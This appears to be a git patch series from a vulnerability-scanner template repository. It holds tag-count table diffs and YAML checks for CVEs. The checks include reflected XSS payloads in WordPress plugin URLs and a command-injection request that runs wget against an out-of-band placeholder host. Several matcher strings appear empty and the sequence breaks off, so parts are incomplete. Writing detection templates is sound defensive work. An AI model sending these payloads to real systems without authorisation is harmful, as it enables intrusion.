faraday | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | | clockwatch | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | | solman | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | | netis | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | | dlogin | 1 | | | | | | | | | | shopware | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | | totaljs | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | | liferay | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| akkadian | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 0804d72191..0f79e9d451 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 512 | dhiyaneshdk | 220 | cves | 519 | info | 535 | http | 1567 | +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | | panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 202 | dns | 10 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | | exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 174 | daffainfo | 99 | misconfiguration | 115 | | | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | | cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 49 | file | 42 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | | config | 90 | gaurang | 42 | workflows | 34 | | | | | From f59905ced202f44d39a2eae466ed5e18cb27fd16 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 3 Aug 2021 21:31:33 +0700 Subject: [PATCH 1417/4083] Add CVE-2021-37216 --- cves/2021/CVE-2021-37216.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2021/CVE-2021-37216.yaml diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml new file mode 100644 index 0000000000..635ca39a88 --- /dev/null +++ b/cves/2021/CVE-2021-37216.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-37216 + +info: + name: QSAN Storage Manager prior to v3.3.3 Reflected XSS + author: dwisiswant0 + description: | + QSAN Storage Manager header page parameters does not filter special characters. + Remote attackers can inject JavaScript without logging in and launch + reflected XSS attacks to access and modify specific data. + reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html + severity: medium + tags: cve,cve2021,xss,qsan + +requests: + - method: GET + path: + - "{{BaseURL}}/http_header.php" + headers: + X-Trigger-XSS: "" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"HTTP_X_TRIGGER_XSS\":\"\"" + - type: word + part: header + words: + - "text/html" + - type: word + part: header + words: + - "X-XSS-Protection" + negative: true \ No newline at end of file From 1b5420bc4b9b4a2b723c41a7371208f37d7a96e1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 3 Aug 2021 20:14:14 +0530 Subject: [PATCH 1418/4083] updated matcher --- cves/2021/CVE-2021-37216.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml index 635ca39a88..33de2b4095 100644 --- a/cves/2021/CVE-2021-37216.yaml +++ b/cves/2021/CVE-2021-37216.yaml @@ -17,18 +17,20 @@ requests: - "{{BaseURL}}/http_header.php" headers: X-Trigger-XSS: "" + matchers-condition: and matchers: + - type: word part: body words: - - "\"HTTP_X_TRIGGER_XSS\":\"\"" + - '"HTTP_X_TRIGGER_XSS":""' + - type: word part: header words: - "text/html" - - type: word - part: header - words: - - "X-XSS-Protection" - negative: true \ No newline at end of file + + - type: dsl + dsl: + - "!contains(tolower(all_headers), 'x-xss-protection')" \ No newline at end of file From a3347504fed72b248424dbc3ac0b79adb087975e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 3 Aug 2021 20:18:40 +0530 Subject: [PATCH 1419/4083] minor update --- cves/2021/CVE-2021-32305.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index b188151e6b..0326dec716 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml @@ -15,10 +15,8 @@ requests: - | GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word From e6ea819b9c0eeec4ac0d9e5014d8a501130ee5db Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 20:31:20 +0530 Subject: [PATCH 1420/4083] Update CVE-2016-1000155.yaml --- cves/2016/CVE-2016-1000155.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml index 68e4fc346b..4772141fcf 100644 --- a/cves/2016/CVE-2016-1000155.yaml +++ b/cves/2016/CVE-2016-1000155.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From a5f74e04849953350d6ddb5c93338be0ac0d1761 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 20:33:02 +0530 Subject: [PATCH 1421/4083] Update CVE-2016-1000153.yaml --- cves/2016/CVE-2016-1000153.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml index c71b4ef368..e1ae1a74aa 100644 --- a/cves/2016/CVE-2016-1000153.yaml +++ b/cves/2016/CVE-2016-1000153.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e9313b15be3a570d3554dba3591d54dc4eceee9d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 4 Aug 2021 00:07:14 +0700 Subject: [PATCH 1422/4083] Create CVE-2015-9414.yaml --- cves/2015/CVE-2015-9414.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2015/CVE-2015-9414.yaml diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml new file mode 100644 index 0000000000..6ea85964ff --- /dev/null +++ b/cves/2015/CVE-2015-9414.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-9414 + +info: + name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 + - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 + tags: cve,cve2015,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 1d888e8b4e3a7c2c80981182f20b01c8d1c39dcc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 4 Aug 2021 00:09:09 +0700 Subject: [PATCH 1423/4083] Create CVE-2015-2807.yaml --- cves/2015/CVE-2015-2807.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2015/CVE-2015-2807.yaml diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml new file mode 100644 index 0000000000..b9091ee309 --- /dev/null +++ b/cves/2015/CVE-2015-2807.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-2807 + +info: + name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + tags: cve,cve2015,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%22xss%22)%3C/script%3E%3Cscript%20src=%22" + + matchers-condition: and + matchers: + - type: word + words: + - '">alert("xss")' part: body - type: word From ca9242507144016bc70c1f7837255576c43a7147 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 4 Aug 2021 14:07:35 +0530 Subject: [PATCH 1430/4083] Update CVE-2015-2807.yaml --- cves/2015/CVE-2015-2807.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index b9091ee309..087cc89239 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%22xss%22)%3C/script%3E%3Cscript%20src=%22" + - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '">alert("xss")" + - "input/Autofocus/%0D*/Onfocus=alert(123);" + - "goto-tour-list-js-extra" part: body + condition: and - type: word part: header From 6d04bd37573db378ad15435eb2633c9afd833960 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 5 Aug 2021 01:21:36 +0900 Subject: [PATCH 1434/4083] Update favicon-detection.yaml Signed-off-by: GwanYeong Kim --- technologies/favicon-detection.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 89726898b3..8d657ebdde 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2553,4 +2553,9 @@ requests: - type: dsl name: "KevinLAB" dsl: - - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))" + + - type: dsl + name: "qdPM" + dsl: + - "status_code==200 && (\"762074255\" == mmh3(base64_py(body)))" From 3c9b6e955c30ad3ae87fa53125ea9dd8add294b4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 4 Aug 2021 21:55:59 +0530 Subject: [PATCH 1435/4083] Additional matchers --- fuzzing/prestashop-module-fuzz.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml index 4ea4775c8a..f0af5c7704 100644 --- a/fuzzing/prestashop-module-fuzz.yaml +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -26,6 +26,14 @@ requests: - type: word words: - "" + - "" + - "" + - "" + condition: and + + - type: status + status: + - 200 extractors: - type: regex From d50fc14b747e96acb0ef364808e5c78244f22019 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 4 Aug 2021 21:58:54 +0530 Subject: [PATCH 1436/4083] Update prestashop-module-fuzz.yaml --- fuzzing/prestashop-module-fuzz.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml index f0af5c7704..434b666a00 100644 --- a/fuzzing/prestashop-module-fuzz.yaml +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -1,6 +1,6 @@ id: prestashop-module-fuzz info: - name: Prestashop Modules Fuzz + name: Prestashop Modules Enumeration author: meme-lord severity: info tags: fuzz,prestashop @@ -28,6 +28,7 @@ requests: - "" - "" - "" + - "" - "" condition: and From 3dc119697072b94649e730cd700319ad87df8e8a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: 